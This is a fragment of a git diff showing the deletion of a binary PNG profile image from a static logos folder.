a/static/img/logos/profile-pic-4.png b/static/img/logos/profile-pic-4.png deleted file mode 100644 index e735671..0000000 Binary files a/static/img/logos/profile-pic-4.png and /dev/null differ